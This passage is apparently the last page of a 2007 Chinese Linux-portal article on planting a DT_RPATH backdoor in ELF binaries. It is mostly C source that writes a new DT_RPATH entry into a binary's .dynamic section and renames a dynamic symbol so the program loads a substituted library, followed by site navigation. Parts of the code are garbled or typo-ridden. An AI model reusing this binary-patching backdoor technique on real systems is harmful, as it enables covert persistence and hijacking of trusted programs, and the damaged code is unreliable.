您现在的位置：中国IT实验室 >> Linux >> 系统管理 >> 系统管理 >> 正文

Linux系统下解析Elf文件DT_RPATH后门

2007-4-12

欢迎进入Linux社区论坛，与200万技术人员互动交流 >>进入

{

if(shdyn->sh_type==SHT_DYNAMIC)

{

find=1;

break ;

}

shdyn++;

}

if(find==0)

{

printf("。dynamic section not find\n");

exit(0);

}

dyn=(Elf32_Dyn *)malloc(shdyn->sh_size);

if(dyn==NULL)

ERR("malloc");

if(lseek(fd,shdyn->sh_offset,SEEK_SET)!=shdyn->sh_offset)

ERR("lseek");

if(read(fd,dyn,shdyn->sh_size)!=shdyn->sh_size)

ERR("read");

dynp=dyn;

for(i=0;ish_size;i+=shdyn->sh_entsize)

{

ent++;

/*here is only find first NULL entry , not think too much,also don't find DT_RPAHT is exist!

add your code here:) */

if(dynp->d_tag==0 && (dynp->d_un。d_val==0 || dynp->d_un。d_ptr==0))

{

printf("+%d real entrys add DT_RPATH entry\n",ent-1);

offset=(dynp-dyn)*shdyn->sh_entsize;

goto modify;

}

dynp++;

}

out:

printf("no space\n");

free(dyn);

return -1;

modify:

if(lseek(fd,shdyn->sh_offset+offset,SEEK_SET)!=shdyn->sh_offset+offset)

ERR("lseek");

if(write(fd,&dt_rpath,sizeof(dynp->d_tag))!=sizeof(dynp->d_tag))

ERR("write");

if(write(fd,index,sizeof(dynp->d_un。d_val))!=sizeof(dynp->d_un。d_val))

ERR("write");

printf("+game over\n");

free(dyn);

return 0;

}

/*---------------------------------modifiy symbol name-------------------------------------------*/

static int mod_sym(int fd , Elf32_Ehdr * ehdr,Elf32_Shdr * shdr,char * symname)

{

Elf32_Shdr * shdrp=shdr;//for loop

Elf32_Shdr * strsym;

char * string;

Elf32_Sym *sym,*symp;

int i;

int find=0;

for(i=0;ie_shnum;i++)

{

if(shdrp->sh_type==SHT_DYNSYM)

{ find=1;

break;

}

shdrp++;

}

if(!find)

{

printf("not find SHT_DYNSYM\n");

exit(1);

}

strsym=&shdr[shdrp->sh_link];

string=(char *)malloc(strsym->sh_size);

if(strsym==NULL)

ERR("malloc");

if(lseek(fd,strsym->sh_offset,SEEK_SET)!=strsym->sh_offset)

ERR("lseek");

if(read(fd,string,strsym->sh_size)!=strsym->sh_size)

ERR("read");

sym=(Elf32_Sym *)malloc(shdrp->sh_size);

if(sym==NULL)

ERR("malloc");

if(lseek(fd,shdrp->sh_offset,SEEK_SET)!=shdrp->sh_offset)

ERR("malloc");

if(read(fd,sym,shdrp->sh_size)!=shdrp->sh_size)

ERR("read");

symp=sym;

for(i=0;ish_size;i+=shdrp->sh_entsize)

{

if(!strcmp(&string[symp->st_name],symname))

{

if(lseek(fd,strsym->sh_offset+symp->st_name,SEEK_SET)!=strsym->sh_offset+symp->st_name)

ERR("lseek");

printf("+modify %s to %s \n",symgname,myname);

if(write(fd,myname,strlen(symgname))!=strlen(symgname))

ERR("write");

free(string);

return symp->st_name;

}

symp++;

}

printf("not find match symbol\n");

return -1;

}

/*---------------------------------file check--------------------------------------------*/

void elf_check(Elf32_Ehdr *ehdr)

{

//add your code here ,not supply

}

/*---------------------------------------main----------------------------------------------------*/

上一页 [1] [2] [3] [4] [5] [6] [7] 下一页

【责编:Youping】

IBM在Linux预装Lotus在桌面市场死磕微软
Mobile Linux组织融合背后的故事
移动平台争夺战:Linux有望步入主流市场
分享Linux程序员Spence Murray的开发技巧
镇压Linux！微软Windows XP价格下调70%
Linux 服务器日志文件查找技巧精粹
市场研究:Linux将开始主导MID市场
开发版：Linux Mint 5 RC1 “KDE”发布
linux-sed-非交互性文本流编辑器
高级Linux安全管理技巧之十剑

相关产品和培训

文章评论

·IDC资讯大全
·机房品质万里行
·IDC托管必备知识
·全国IDC报价
·网站推广优化

　专题推荐

　·防范Linux病毒打造没有病毒的乐土…
　·Linux Shell编程实用指南…
　·Linux日志分析与管理
　·揭密Linux内存管理
　·邮件服务Sendmail应用配置
　·Linux 安全管理…
　·Linux 下DNS服务器架设攻略…
　·Linux 下的路由的配置与应用…
　·专题：Apache实用手册
　·全面剖析Linux文件系统

　今日更新

· IBM在Linux预装Lotus在桌面市场死磕微软
· Mobile Linux组织融合背后的故事
· 移动平台争夺战:Linux有望步入主流市场
· 分享Linux程序员Spence Murray的开发技巧
· 镇压Linux！微软Windows XP价格下调70%
· Linux 服务器日志文件查找技巧精粹
· 市场研究:Linux将开始主导MID市场
· 开发版：Fedora 10 Alpha发布
· 开发版：Linux Mint 5 RC1 “KDE”发布
· LiMo增11个新成员21款手机用LiMo平台

　认证培训

　频道精选

· 新版CCNA考试大纲 07年8月1日生效
· 新手学习宝典：Linux常用命令全集
· 知已知彼，深入了解系统安全知识
· 从入门到精通 java初学者实践系列教程
· 共同学习——Oracle入门基础专题
· ADO.net与PowerBuilder的综合比较
· 评论：中国互联网“钱”途何在？
· 中科院：龙芯要成"中国奔腾" 能卖1亿颗

　Windows频道导航

新手入门
Linux安装　常用命令　软件使用
系统管理
设备驱动　 Linux汉化　系统管理
 桌面应用　内核技术
网络管理
Linux安全　网络管理　 Linux服务器
Linux数据库
MYSQL　POSTGRE
Linux编程
CC++编程　 Python编程　 Perl编程
 PHP　SHELL编程
Linux下载
系统管理　游戏娱乐　服务器类
 开发工具　 X-windows　参考手册
 网络工具　多媒体
 Linux集群　Linux手册　Linux认证
Unix　资讯动态